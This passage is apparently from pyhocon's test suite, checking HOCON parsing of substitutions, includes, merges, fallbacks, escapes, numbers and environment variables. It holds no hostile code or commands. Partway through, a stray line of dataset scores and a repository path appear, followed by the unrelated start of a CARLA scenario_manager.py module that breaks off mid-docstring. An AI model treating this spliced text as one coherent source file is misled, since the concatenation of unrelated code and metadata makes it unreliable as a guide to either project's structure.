assert set(config.get("x").keys()) == set(['y', 'z'])
def test_self_ref_substitution_dict_path_hide(self):
config = ConfigFactory.parse_string(
"""
x = {y: {y: 1}}
x = ${x.y}
"""
)
assert config.get("x.y") == 1
assert set(config.get("x").keys()) == set(['y'])
def test_self_ref_substitution_dict_recurse(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
x = ${x}
"""
)
def test_self_ref_substitution_dict_recurse2(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
x = ${x}
x = ${x}
"""
)
def test_self_ref_substitution_dict_merge(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
foo : { a : { c : 1 } }
foo : ${foo.a}
foo : { a : 2 }
"""
)
assert config.get('foo') == {'a': 2, 'c': 1}
assert set(config.keys()) == set(['foo'])
def test_self_ref_substitution_dict_otherfield(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
bar : {
foo : 42,
baz : ${bar.foo}
}
"""
)
assert config.get("bar") == {'foo': 42, 'baz': 42}
assert set(config.keys()) == set(['bar'])
def test_self_ref_substitution_dict_otherfield_merged_in(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
bar : {
foo : 42,
baz : ${bar.foo}
}
bar : { foo : 43 }
"""
)
assert config.get("bar") == {'foo': 43, 'baz': 43}
assert set(config.keys()) == set(['bar'])
def test_self_ref_substitution_dict_otherfield_merged_in_mutual(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
// bar.a should end up as 4
bar : { a : ${foo.d}, b : 1 }
bar.b = 3
// foo.c should end up as 3
foo : { c : ${bar.b}, d : 2 }
foo.d = 4
"""
)
assert config.get("bar") == {'a': 4, 'b': 3}
assert config.get("foo") == {'c': 3, 'd': 4}
assert set(config.keys()) == set(['bar', 'foo'])
def test_self_ref_substitution_string_opt_concat(self):
'''
Example from HOCON spec
'''
config = ConfigFactory.parse_string(
"""
a = ${?a}foo
"""
)
assert config.get("a") == 'foo'
assert set(config.keys()) == set(['a'])
def test_self_ref_substitution_dict_recurse_part(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
x = ${x} {y: 1}
x = ${x.y}
"""
)
def test_self_ref_substitution_object(self):
config = ConfigFactory.parse_string(
"""
x = {a: 1, b: 2}
x = ${x} {c: 3}
x = {z: 0} ${x}
x = {y: -1} ${x} {d: 4}
"""
)
assert config.get("x") == {'a': 1, 'b': 2, 'c': 3, 'z': 0, 'y': -1, 'd': 4}
def test_self_ref_child(self):
config = ConfigFactory.parse_string(
"""
a.b = 3
a.b = ${a.b}
a.b = ${a.b}
a.c = [1,2]
a.c = ${a.c}
a.d = {foo: bar}
a.d = ${a.d}
"""
)
assert config.get("a") == {'b': 3, 'c': [1, 2], 'd': {'foo': 'bar'}}
def test_concat_multi_line_string(self):
config = ConfigFactory.parse_string(
"""
common_modules = perl \
java \
python
"""
)
assert [x.strip() for x in config['common_modules'].split() if x.strip(' ') != ''] == ['perl', 'java', 'python']
def test_concat_multi_line_list(self):
config = ConfigFactory.parse_string(
"""
common_modules = [perl] \
[java] \
[python]
"""
)
assert config['common_modules'] == ['perl', 'java', 'python']
def test_concat_multi_line_dict(self):
config = ConfigFactory.parse_string(
"""
common_modules = {a:perl} \
{b:java} \
{c:python}
"""
)
assert config['common_modules'] == {'a': 'perl', 'b': 'java', 'c': 'python'}
def test_parse_URL_from_samples(self):
config = ConfigFactory.parse_URL("file:samples/aws.conf")
assert config.get('data-center-generic.cluster-size') == 6
assert config.get('large-jvm-opts') == ['-XX:+UseParNewGC', '-Xm16g']
def test_parse_URL_from_invalid(self):
config = ConfigFactory.parse_URL("https://nosuchurl")
assert config == []
def test_include_dict_from_samples(self):
config = ConfigFactory.parse_file("samples/animals.conf")
assert config.get('cat.garfield.say') == 'meow'
assert config.get('dog.mutt.hates.garfield.say') == 'meow'
def test_include_glob_dict_from_samples(self):
config = ConfigFactory.parse_file("samples/all_animals.conf")
assert config.get('animals.garfield.say') == 'meow'
assert config.get('animals.mutt.hates.garfield.say') == 'meow'
def test_include_glob_list_from_samples(self):
config = ConfigFactory.parse_file("samples/all_bars.conf")
bars = config.get_list('bars')
assert len(bars) == 10
names = {bar['name'] for bar in bars}
types = {bar['type'] for bar in bars if 'type' in bar}
print(types, '(((((')
assert '<NAME>' in names
assert 'Homer\'s favorite coffee' in names
assert 'milk' in types
def test_list_of_dicts(self):
config = ConfigFactory.parse_string(
"""
a: [
{a: 1, b: 2},
{a: 3, c: 4},
]
"""
)
assert config['a'] == [
{'a': 1, 'b': 2},
{'a': 3, 'c': 4}
]
def test_list_of_lists(self):
config = ConfigFactory.parse_string(
"""
a: [
[1, 2]
[3, 4]
]
"""
)
assert config['a'] == [
[1, 2],
[3, 4]
]
def test_list_of_dicts_with_merge(self):
config = ConfigFactory.parse_string(
"""
b = {f: 4}
a: [
${b} {a: 1, b: 2},
{a: 3, c: 4} ${b},
{a: 3} ${b} {c: 6},
]
"""
)
assert config['a'] == [
{'a': 1, 'b': 2, 'f': 4},
{'a': 3, 'c': 4, 'f': 4},
{'a': 3, 'c': 6, 'f': 4}
]
def test_list_of_lists_with_merge(self):
config = ConfigFactory.parse_string(
"""
b = [5, 6]
a: [
${b} [1, 2]
[3, 4] ${b}
[1, 2] ${b} [7, 8]
]
"""
)
assert config['a'] == [
[5, 6, 1, 2],
[3, 4, 5, 6],
[1, 2, 5, 6, 7, 8]
]
def test_invalid_assignment(self):
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string('common_modules [perl]')
with pytest.raises(ParseException):
ConfigFactory.parse_string('common_modules {} {perl: 1}')
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string(
"""
a = {f: 5}
common_modules ${a} {perl: 1}
""")
def test_invalid_dict(self):
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string(
"""
a = {
f: 5
g
}
""")
with pytest.raises(ParseSyntaxException):
ConfigFactory.parse_string('a = {g}')
def test_include_file(self):
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('[1, 2]')
fdin.flush()
config1 = ConfigFactory.parse_string(
"""
a: [
include "{tmp_file}"
]
""".format(tmp_file=fdin.name)
)
assert config1['a'] == [1, 2]
config2 = ConfigFactory.parse_string(
"""
a: [
include file("{tmp_file}")
]
""".format(tmp_file=fdin.name)
)
assert config2['a'] == [1, 2]
config3 = ConfigFactory.parse_string(
"""
a: [
include url("file://{tmp_file}")
]
""".format(tmp_file=fdin.name)
)
assert config3['a'] == [1, 2]
def test_include_missing_file(self):
config1 = ConfigFactory.parse_string(
"""
a: [
include "dummy.txt"
3
4
]
"""
)
assert config1['a'] == [3, 4]
def test_include_required_file(self):
config = ConfigFactory.parse_string(
"""
a {
include required("samples/animals.d/cat.conf")
t = 2
}
"""
)
expected = {
'a': {
'garfield': {
'say': 'meow'
},
't': 2
}
}
assert expected == config
config2 = ConfigFactory.parse_string(
"""
a {
include required(file("samples/animals.d/cat.conf"))
t = 2
}
"""
)
assert expected == config2
def test_include_missing_required_file(self):
with pytest.raises(IOError):
ConfigFactory.parse_string(
"""
a: [
include required("dummy.txt")
3
4
]
"""
)
def test_resolve_package_path(self):
path = ConfigParser.resolve_package_path("pyhocon:config_parser.py")
assert os.path.exists(path)
def test_resolve_package_path_format(self):
with pytest.raises(ValueError):
ConfigParser.resolve_package_path("pyhocon/config_parser.py")
def test_resolve_package_path_missing(self):
with pytest.raises(ImportError):
ConfigParser.resolve_package_path("non_existent_module:foo.py")
def test_include_package_file(self, monkeypatch):
temp_dir = tempfile.mkdtemp()
try:
module_dir = os.path.join(temp_dir, 'my_module')
module_conf = os.path.join(module_dir, 'my.conf')
# create the module folder and necessary files (__init__ and config)
os.mkdir(module_dir)
open(os.path.join(module_dir, '__init__.py'), 'a').close()
with open(module_conf, 'w') as fdin:
fdin.write("{c: 3}")
# add the temp dir to sys.path so that 'my_module' can be discovered
monkeypatch.syspath_prepend(temp_dir)
# load the config and include the other config file from 'my_module'
config = ConfigFactory.parse_string(
"""
a: 1
b: 2
include package("my_module:my.conf")
"""
)
# check that the contents of both config files are available
assert dict(config.as_plain_ordered_dict()) == {'a': 1, 'b': 2, 'c': 3}
finally:
shutil.rmtree(temp_dir, ignore_errors=True)
def test_include_dict(self):
expected_res = {
'a': 1,
'b': 2,
'c': 3,
'd': 4
}
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('{a: 1, b: 2}')
fdin.flush()
config1 = ConfigFactory.parse_string(
"""
a: {{
include "{tmp_file}"
c: 3
d: 4
}}
""".format(tmp_file=fdin.name)
)
assert config1['a'] == expected_res
config2 = ConfigFactory.parse_string(
"""
a: {{
c: 3
d: 4
include "{tmp_file}"
}}
""".format(tmp_file=fdin.name)
)
assert config2['a'] == expected_res
config3 = ConfigFactory.parse_string(
"""
a: {{
c: 3
include "{tmp_file}"
d: 4
}}
""".format(tmp_file=fdin.name)
)
assert config3['a'] == expected_res
def test_include_substitution(self):
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('y = ${x}')
fdin.flush()
config = ConfigFactory.parse_string(
"""
include "{tmp_file}"
x = 42
""".format(tmp_file=fdin.name)
)
assert config['x'] == 42
assert config['y'] == 42
@pytest.mark.xfail
def test_include_substitution2(self):
with tempfile.NamedTemporaryFile('w') as fdin:
fdin.write('{ x : 10, y : ${x} }')
fdin.flush()
config = ConfigFactory.parse_string(
"""
{
a : { include """ + '"' + fdin.name + """" }
a : { x : 42 }
}
"""
)
assert config['a']['x'] == 42
assert config['a']['y'] == 42
def test_var_with_include_keyword(self):
config = ConfigFactory.parse_string(
"""
include-database=true
""")
assert config == {
'include-database': True
}
def test_substitution_override(self):
config = ConfigFactory.parse_string(
"""
database {
host = localhost
port = 5432
user = people
name = peopledb
pass = <PASSWORD>
}
user=test_user
pass=<PASSWORD>
database {
user = ${user}
pass = ${pass}
}
""")
assert config['database.user'] == 'test_user'
assert config['database.pass'] == '<PASSWORD>'
def test_substitution_flat_override(self):
config = ConfigFactory.parse_string(
"""
database {
name = peopledb
pass = <PASSWORD>
name = ${?NOT_EXISTS}
pass = ${?NOT_EXISTS}
}
""")
assert config['database.name'] == 'peopledb'
assert config['database.pass'] == '<PASSWORD>'
def test_substitution_multiple_override(self):
config = ConfigFactory.parse_string(
"""
a: 1
b: foo
c: ${a} ${b}
c: ${b} ${a}
d: ${a} ${b}
d: ${a} bar
""")
assert config['c'] == 'foo 1'
assert config['d'] == '1 bar'
def test_substitution_nested_override(self):
config = ConfigFactory.parse_string(
"""
database {
name = peopledb
pass = <PASSWORD>
}
database {
name = ${?user}
pass = ${?pass}
}
""")
assert config['database.name'] == 'peopledb'
assert config['database.pass'] == '<PASSWORD>'
def test_optional_with_merge(self):
unresolved = ConfigFactory.parse_string(
"""
foo: 42
foo: ${?a}
""", resolve=False)
source = ConfigFactory.parse_string(
"""
b: 14
""")
config = unresolved.with_fallback(source)
assert config['foo'] == 42
config = source.with_fallback(unresolved)
assert config['foo'] == 42
def test_fallback_with_resolve(self):
config3 = ConfigFactory.parse_string("c=5")
config2 = ConfigFactory.parse_string("b=${c}", resolve=False)
config1 = ConfigFactory.parse_string("a=${b}", resolve=False) \
.with_fallback(config2, resolve=False) \
.with_fallback(config3)
assert {'a': 5, 'b': 5, 'c': 5} == config1
def test_optional_substitution(self):
config = ConfigFactory.parse_string(
"""
a = 45
b = ${?c}
d = ${?c} 4
e = ${?a}
g = ${?c1} ${?c2}
h = ${?c1} ${?c2} 1
""")
assert 'b' not in config
assert config['d'] == 4
assert config['e'] == 45
assert 'g' not in config
assert config['h'] == 1
def test_cascade_optional_substitution(self):
config = ConfigFactory.parse_string(
"""
num = 3
retries_msg = You have ${num} retries
retries_msg = ${?CUSTOM_MSG}
""")
assert config == {
'num': 3,
'retries_msg': 'You have 3 retries'
}
def test_substitution_cycle(self):
with pytest.raises(ConfigSubstitutionException):
ConfigFactory.parse_string(
"""
a = ${b}
b = ${c}
c = ${a}
""")
def test_assign_number_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
4
b = # test
# test2
5
c =
6
"""
)
assert config['a'] == 4
assert config['b'] == 5
assert config['c'] == 6
def test_assign_int(self):
config = ConfigFactory.parse_string(
"""
short = 12
long = 12321321837612378126213217321
negative = -15
"""
)
# on python 3 long will be an int but on python 2 long will be a long
assert config['short'] == 12
assert isinstance(config['short'], int)
assert config['long'] == 12321321837612378126213217321
assert isinstance(config['negative'], int)
assert config['negative'] == -15
def test_assign_float(self):
config = ConfigFactory.parse_string(
"""
a = 121.22
b = -121.22
c = .54
d = -.54
"""
)
# on python 3 long will be an int but on python 2 long will be a long
assert config['a'] == 121.22
assert config['b'] == -121.22
assert config['c'] == .54
assert config['d'] == -.54
def test_sci_real(self):
"""
Test scientific notation for numbers
"""
config = ConfigFactory.parse_string(
"""
short = 12.12321
long1 = 121.22E3423432
neg_long1 = 121.22E-1
long2 = 121.22e3423432
neg_long2 = 121.22e-3
"""
)
# on python 3 long will be an int but on python 2 long will be a long
assert config['short'] == 12.12321
assert config['long1'] == 121.22E3423432
assert config['neg_long1'] == 121.22E-1
assert config['long2'] == 121.22E3423432
assert config['neg_long2'] == 121.22E-3
def test_assign_strings_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
"a"
b = # test
# test2
"b"
c =
"c"
"""
)
assert config['a'] == 'a'
assert config['b'] == 'b'
assert config['c'] == 'c'
def test_assign_list_numbers_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
[
1,
2,
]
b = # test
# test2
[
3,
4,]
c =
[
5,
6
]
"""
)
assert config['a'] == [1, 2]
assert config['b'] == [3, 4]
assert config['c'] == [5, 6]
def test_assign_list_strings_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
[
"a",
"b",
]
b = # test
# test2
[
"c",
"d",]
c =
[
"e",
"f"
]
"""
)
assert config['a'] == ['a', 'b']
assert config['b'] == ['c', 'd']
assert config['c'] == ['e', 'f']
def test_assign_dict_strings_with_equal_sign_with_eol(self):
config = ConfigFactory.parse_string(
"""
a =
{
a: 1,
b: 2,
}
b = # test
# test2
{
c: 3,
d: 4,}
c =
{
e: 5,
f: 6
}
"""
)
assert config['a'] == {'a': 1, 'b': 2}
assert config['b'] == {'c': 3, 'd': 4}
assert config['c'] == {'e': 5, 'f': 6}
def test_assign_dict_strings_no_equal_sign_with_eol(self):
config = ConfigFactory.parse_string(
"""
a
{
a: 1,
b: 2,
}
b # test
# test2
{
c: 3,
d: 4,}
c
{
e: 5,
f: 6
}
"""
)
assert config['a'] == {'a': 1, 'b': 2}
assert config['b'] == {'c': 3, 'd': 4}
assert config['c'] == {'e': 5, 'f': 6}
def test_substitutions_overwrite(self):
config1 = ConfigFactory.parse_string(
"""
a = 123
a = ${?test}
a = 5
"""
)
assert config1['a'] == 5
config2 = ConfigFactory.parse_string(
"""
{
database {
host = "localhost"
port = 8000
url = ${database.host}":"${database.port}
}
database {
host = ${?DB_HOST}
}
database {
host = "other.host.net"
port = 433
}
}
"""
)
assert config2['database']['host'] == 'other.host.net'
assert config2['database']['port'] == 433
assert config2['database']['url'] == 'other.host.net:433'
def test_fallback_substitutions_overwrite(self):
config1 = ConfigFactory.parse_string(
"""
a = {
b: 1
c: 2
}
"""
)
config2 = ConfigFactory.parse_string(
"""
a.b = 4
a.d = 3
"""
)
config3 = config1.with_fallback(config2)
assert config3['a'] == {
'b': 1,
'c': 2,
'd': 3
}
config4 = ConfigFactory.parse_string(
"""
name: foo
"""
)
config5 = ConfigFactory.parse_string(
u"""
longName: "long "${?name}
""",
resolve=False
)
config6 = config4.with_fallback(config5)
assert config6 == {
'longName': 'long foo',
'name': 'foo'
}
def test_fallback_substitutions_overwrite_file(self):
config1 = ConfigFactory.parse_string(
"""
{
data-center-generic = { cluster-size: 8 }
misc = "mist"
}
"""
)
# use unicode path here for regression testing https://github.com/chimpler/pyhocon/issues/44
config2 = config1.with_fallback(u'samples/aws.conf')
assert config2 == {
'data-center-generic': {'cluster-size': 8},
'data-center-east': {'cluster-size': 8, 'name': 'east'},
'misc': 'mist',
'default-jvm-opts': ['-XX:+UseParNewGC'],
'large-jvm-opts': ['-XX:+UseParNewGC', '-Xm16g']
}
def test_fallback_self_ref_substitutions_append(self):
config1 = ConfigFactory.parse_string(
"""
list = [ 1, 2, 3 ]
"""
)
config2 = ConfigFactory.parse_string(
"""
list = ${list} [ 4, 5, 6 ]
""",
resolve=False
)
config2 = config2.with_fallback(config1)
assert config2.get("list") == [1, 2, 3, 4, 5, 6]
def test_fallback_self_ref_substitutions_append_plus_equals(self):
config1 = ConfigFactory.parse_string(
"""
list = [ 1, 2, 3 ]
"""
)
config2 = ConfigFactory.parse_string(
"""
list += [ 4, 5, 6 ]
""",
resolve=False
)
config2 = config2.with_fallback(config1)
assert config2.get("list") == [1, 2, 3, 4, 5, 6]
def test_self_merge_ref_substitutions_object(self):
config1 = ConfigFactory.parse_string(
"""
a : { }
b : 1
c : ${a} { d : [ ${b} ] }
""",
resolve=False
)
config2 = ConfigFactory.parse_string(
"""
e : ${a} {
}
""",
resolve=False
)
merged = ConfigTree.merge_configs(config1, config2)
ConfigParser.resolve_substitutions(merged)
assert merged.get("c.d") == [1]
def test_self_merge_ref_substitutions_object2(self):
config1 = ConfigFactory.parse_string(
"""
x : { v1: 1 }
b1 : {v2: 2 }
b = [${b1}]
""",
resolve=False
)
config2 = ConfigFactory.parse_string(
"""
b2 : ${x} {v2: 3}
b += [${b2}]
""",
resolve=False
)
merged = ConfigTree.merge_configs(config1, config2)
ConfigParser.resolve_substitutions(merged)
b = merged.get("b")
assert len(b) == 2
assert b[0] == {'v2': 2}
assert b[1] == {'v1': 1, 'v2': 3}
def test_self_merge_ref_substitutions_object3(self):
config1 = ConfigFactory.parse_string(
"""
b1 : { v1: 1 }
b = [${b1}]
""",
resolve=False
)
config2 = ConfigFactory.parse_string(
"""
b1 : { v1: 2, v2: 3 }
""",
resolve=False
)
merged = ConfigTree.merge_configs(config1, config2)
ConfigParser.resolve_substitutions(merged)
assert merged.get("b1") == {"v1": 2, "v2": 3}
b = merged.get("b")
assert len(b) == 1
assert b[0] == {"v1": 2, "v2": 3}
def test_fallback_self_ref_substitutions_merge(self):
config1 = ConfigFactory.parse_string(
"""
dict = { x: 1 }
"""
)
config2 = ConfigFactory.parse_string(
"""
dict = ${dict} { y: 2 }
""",
resolve=False
)
config2 = config2.with_fallback(config1)
assert config2.get("dict") == {'x': 1, 'y': 2}
def test_fallback_self_ref_substitutions_concat_string(self):
config1 = ConfigFactory.parse_string(
"""
string = abc
"""
)
config2 = ConfigFactory.parse_string(
"""
string = ${string}def
""",
resolve=False
)
result = config2.with_fallback(config1)
assert result.get("string") == 'abcdef'
# test no mutation on config1
assert result is not config1
# test no mutation on config2
assert "abc" not in str(config2)
def test_fallback_non_root(self):
root = ConfigFactory.parse_string(
"""
a = 1
mid.b = 1
"""
)
config = root.get_config("mid").with_fallback(root)
assert config['a'] == 1 and config['b'] == 1
def test_object_field_substitution(self):
config = ConfigFactory.parse_string(
"""
A = ${Test}
Test {
field1 = 1
field2 = ${Test.field1}"2"
field3 = ${Test.field2}"3"
}
"""
)
assert config.get_string("A.field1") == "1"
assert config.get_string("A.field2") == "12"
assert config.get_string("A.field3") == "123"
assert config.get_string("Test.field1") == "1"
assert config.get_string("Test.field2") == "12"
assert config.get_string("Test.field3") == "123"
def test_one_line_quote_escape(self):
config = ConfigFactory.parse_string(
"""
test_no_quotes: abc\\n\\n
test_quotes: "abc\\n\\n"
"""
)
assert config == {
'test_no_quotes': 'abc\n\n',
'test_quotes': 'abc\n\n'
}
def test_multi_line_escape(self):
config = ConfigFactory.parse_string(
"""
with-escaped-backslash: \"\"\"
\\\\
\"\"\"
with-newline-escape-sequence: \"\"\"
\\n
\"\"\"
with-escaped-newline-escape-sequence: \"\"\"
\\\\n
\"\"\"
"""
)
assert config['with-escaped-backslash'] == '\n\\\\\n'
assert config['with-newline-escape-sequence'] == '\n\\n\n'
assert config['with-escaped-newline-escape-sequence'] == '\n\\\\n\n'
def test_multiline_with_backslash(self):
config = ConfigFactory.parse_string(
"""
test = line1 \
line2
test2 = test
""")
assert config == {
'test': 'line1 line2',
'test2': 'test'
}
def test_from_dict_with_dict(self):
d = {
'banana': 3,
'apple': 4,
'pear': 1,
'orange': 2,
}
config = ConfigFactory.from_dict(d)
assert config == d
def test_from_dict_with_ordered_dict(self):
d = OrderedDict()
d['banana'] = 3
d['apple'] = 4
d['pear'] = 1
d['orange'] = 2
config = ConfigFactory.from_dict(d)
assert config == d
def test_from_dict_with_nested_dict(self):
d = OrderedDict()
d['banana'] = 3
d['apple'] = 4
d['pear'] = 1
d['tree'] = {
'a': 'abc\ntest\n',
'b': [1, 2, 3]
}
config = ConfigFactory.from_dict(d)
assert config == d
def test_object_concat(self):
config = ConfigFactory.parse_string(
"""o1 = {
foo : {
a : 1
b : 2
}
}
o2 = {
foo : {
b : 3
c : 4
}
}
o3 = ${o1} ${o2}
"""
)
assert config.get_int('o1.foo.b') == 2
assert config.get_int('o2.foo.b') == 3
assert config.get_int('o3.foo.b') == 3
assert config.get_int('o1.foo.c', default=42) == 42
assert config.get_int('o3.foo.a') == 1
assert config.get_int('o3.foo.c') == 4
def test_issue_75(self):
config = ConfigFactory.parse_string(
"""base : {
bar: ["a"]
}
sub : ${base} {
baz: ${base.bar} ["b"]
}
sub2: ${sub}
"""
)
assert config.get_list('base.bar') == ["a"]
assert config.get_list('sub.baz') == ["a", "b"]
assert config.get_list('sub2.baz') == ["a", "b"]
def test_plain_ordered_dict(self):
config = ConfigFactory.parse_string(
"""
e : ${a} {
}
""",
resolve=False
)
with pytest.raises(ConfigException):
config.as_plain_ordered_dict()
def test_quoted_strings_with_ws(self):
config = ConfigFactory.parse_string(
"""
no_trailing_ws = "foo" "bar "
trailing_ws = "foo" "bar "{ws}
trailing_ws_with_comment = "foo" "bar "{ws}// comment
""".format(ws=' '))
assert config == {
'no_trailing_ws': "foo bar ",
'trailing_ws': "foo bar ",
'trailing_ws_with_comment': "foo bar "
}
def test_unquoted_strings_with_ws(self):
config = ConfigFactory.parse_string(
"""
a = foo bar
""")
assert config == {
'a': 'foo bar'
}
def test_quoted_unquoted_strings_with_ws(self):
config = ConfigFactory.parse_string(
"""
a = foo "bar" dummy
""")
assert config == {
'a': 'foo bar dummy'
}
def test_quoted_unquoted_strings_with_ws_substitutions(self):
config = ConfigFactory.parse_string(
"""
x = 5
b = test
a = foo "bar" ${b} dummy
c = foo ${x} bv
d = foo ${x} 43
""")
assert config == {
'x': 5,
'b': 'test',
'a': 'foo bar test dummy',
'c': 'foo 5 bv',
'd': 'foo 5 43'
}
def test_complex_substitutions(self):
config = ConfigFactory.parse_string(
"""
a: 1
b: ${c} {
pa: [${a}]
pb: ${b.pa}
}
c: { }
d: { pc: ${b.pa} }
e: ${b}
""", resolve=True)
assert config == {
'a': 1,
'b': {'pa': [1], 'pb': [1]},
'c': {},
'd': {'pc': [1]},
'e': {'pa': [1], 'pb': [1]}
}
def test_assign_next_line(self):
config = ConfigFactory.parse_string(
"""
a = // abc
abc
c =
5
""")
assert config == {
'a': 'abc',
'c': 5
}
@mock.patch.dict(os.environ, STRING_VAR='value_from_environment')
def test_string_from_environment(self):
config = ConfigFactory.parse_string(
"""
string_from_env = ${STRING_VAR}
""")
assert config == {
'string_from_env': 'value_from_environment'
}
@mock.patch.dict(os.environ, STRING_VAR='value_from_environment')
def test_string_from_environment_self_ref(self):
config = ConfigFactory.parse_string(
"""
STRING_VAR = ${STRING_VAR}
""")
assert config == {
'STRING_VAR': 'value_from_environment'
}
@mock.patch.dict(os.environ, STRING_VAR='value_from_environment')
def test_string_from_environment_self_ref_optional(self):
config = ConfigFactory.parse_string(
"""
STRING_VAR = ${?STRING_VAR}
""")
assert config == {
'STRING_VAR': 'value_from_environment'
}
@mock.patch.dict(os.environ, TRUE_OR_FALSE='false')
def test_bool_from_environment(self):
config = ConfigFactory.parse_string(
"""
bool_from_env = ${TRUE_OR_FALSE}
""")
assert config == {
'bool_from_env': 'false'
}
assert config.get_bool('bool_from_env') is False
@mock.patch.dict(os.environ, INT_VAR='5')
def test_int_from_environment(self):
config = ConfigFactory.parse_string(
"""
int_from_env = ${INT_VAR}
""")
assert config == {
'int_from_env': '5'
}
assert config.get_int('int_from_env') == 5
def test_unicode_dict_key(self):
input_string = u"""
www.sample.com {
us {
name = "first domain"
}
}
www.example-ö.com {
us {
name = "second domain"
}
}
"""
config = ConfigFactory.parse_string(input_string)
assert config.get_string(u'www.sample.com.us.name') == 'first domain'
assert config.get_string(u'www.example-ö.com.us.name') == 'second domain'
with pytest.raises(ConfigWrongTypeException):
config.put(u'www.example-ö', 'append_failure', append=True)
with pytest.raises(ConfigMissingException):
config.get_string(u'missing_unicode_key_ö')
with pytest.raises(ConfigException):
config.get_bool(u'www.example-ö.com.us.name')
with pytest.raises(ConfigException):
config.get_list(u'www.example-ö.com.us.name')
with pytest.raises(ConfigException):
config.get_config(u'www.example-ö.com.us.name')
with pytest.raises(ConfigWrongTypeException):
config.get_string(u'www.example-ö.com.us.name.missing')
def test_with_comment_on_last_line(self):
# Address issue #102
config_tree = ConfigFactory.parse_string("""
foo: "1"
bar: "2"
# DO NOT CHANGE ANY OF THE ABOVE SETTINGS!""")
assert config_tree == {
'foo': '1',
'bar': '2'
}
def test_triple_quotes_same_line(self):
config_tree = ConfigFactory.parse_string('a:["""foo"""", "bar"]')
assert config_tree == {
'a': ['foo"', "bar"]
}
def test_pop(self):
config_tree = ConfigFactory.parse_string('a:{b: 3, d: 6}')
assert 3 == config_tree.pop('a.b', 5)
assert 5 == config_tree.pop('a.c', 5)
expected = {
'a': {'d': 6}
}
assert expected == config_tree
def test_merge_overriden(self):
# Address issue #110
# ConfigValues must merge with its .overriden_value
# if both are ConfigTree
config_tree = ConfigFactory.parse_string("""
foo: ${bar}
foo: ${baz}
bar: {r: 1, s: 2}
baz: {s: 3, t: 4}
""")
assert 'r' in config_tree['foo'] and 't' in config_tree['foo'] and config_tree['foo']['s'] == 3
def test_attr_syntax(self):
config = ConfigFactory.parse_string(
"""
a: 1
b: {
pb: 5
}
""")
assert 5 == config.b.pb
def test_escape_quote(self):
config = ConfigFactory.parse_string(
"""
quoted: "abc\\"test"
unquoted: abc\\"test
""")
assert 'abc"test' == config['quoted']
assert 'abc"test' == config['unquoted']
def test_escape_quote_complex(self):
config = ConfigFactory.parse_string(
"""
value: "{\\"critical\\":\\"0.00\\",\\"warning\\":\\"99.99\\"}"
"""
)
assert '{"critical":"0.00","warning":"99.99"}' == config['value']
def test_keys_with_slash(self):
config = ConfigFactory.parse_string(
"""
/abc/cde1: abc
"/abc/cde2": "cde"
/abc/cde3: "fgh"
""")
assert 'abc' == config['/abc/cde1']
assert 'cde' == config['/abc/cde2']
assert 'fgh' == config['/abc/cde3']
def test_mutation_values(self):
config = ConfigFactory.parse_string(
"""
common : {
}
b1 = []
var = "wrong"
compilerCommon : ${common} {
VAR : ${var}
}
substrate-suite: {
VAR : "right"
}
b1 = [
${compilerCommon} ${substrate-suite}
${compilerCommon} ${substrate-suite}
]
b2 = [
${compilerCommon} ${substrate-suite}
${compilerCommon} ${substrate-suite}
]
""")
assert config.get("b1")[1]['VAR'] == 'right'
assert config.get("b2")[1]['VAR'] == 'right'
def test_escape_sequences_json_equivalence(self):
"""
Quoted strings are in the same format as JSON strings.
See: https://github.com/lightbend/config/blob/master/HOCON.md#unchanged-from-json
"""
source = r"""
{
"plain-backslash": "\\",
"tab": "\t",
"no-tab": "\\t",
"newline": "\n",
"no-newline": "\\n",
"cr": "\r",
"no-cr": "\\r",
"windows": "c:\\temp"
}
"""
expected = {
'plain-backslash': '\\',
'tab': '\t',
'no-tab': '\\t',
'newline': '\n',
'no-newline': '\\n',
'cr': '\r',
'no-cr': '\\r',
'windows': 'c:\\temp',
}
config = ConfigFactory.parse_string(source)
assert config == expected
assert config == json.loads(source)
try:
from dateutil.relativedelta import relativedelta
@pytest.mark.parametrize('data_set', [
('a: 1 months', relativedelta(months=1)),
('a: 1months', relativedelta(months=1)),
('a: 2 month', relativedelta(months=2)),
('a: 3 mo', relativedelta(months=3)),
('a: 3mo', relativedelta(months=3)),
('a: 3 mon', '3 mon'),
('a: 1 years', relativedelta(years=1)),
('a: 1years', relativedelta(years=1)),
('a: 2 year', relativedelta(years=2)),
('a: 3 y', relativedelta(years=3)),
('a: 3y', relativedelta(years=3)),
])
def test_parse_string_with_duration_optional_units(data_set):
config = ConfigFactory.parse_string(data_set[0])
assert config['a'] == data_set[1]
except Exception:
pass
| 2.453125 | 2 |
scenario_runner/srunner/scenariomanager/scenario_manager.py | cgeller/WorldOnRails | 447 | 3458 |
#!/usr/bin/env python
# Copyright (c) 2018-2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
"""
This module provides the ScenarioManager implementation.
It must not be modified and is for reference only!
"""
from __future__ import print_function
import sys
import time
import py_trees
from srunner.autoagents.agent_wrapper import AgentWrapper
from srunner.scenariomanager.carla_data_provider import CarlaDataProvider
from srunner.scenariomanager.result_writer import ResultOutputProvider
from srunner.scenariomanager.timer import GameTime
from srunner.scenariomanager.watchdog import Watchdog
class ScenarioManager(object):
"""
Basic scenario manager class. This class holds all functionality
required to start and analyze a scenario.
The user must not modify this class.
To use the ScenarioManager:
1. Create an object via manager = ScenarioManager()
2. Load a scenario via manager.load_scenario()
3. Trigger the execution of the scenario manager.run_scenario()
This function is designed to explicitly control start and end of
the scenario execution
4. Trigger a result evaluation with manager.analyze_scenario()
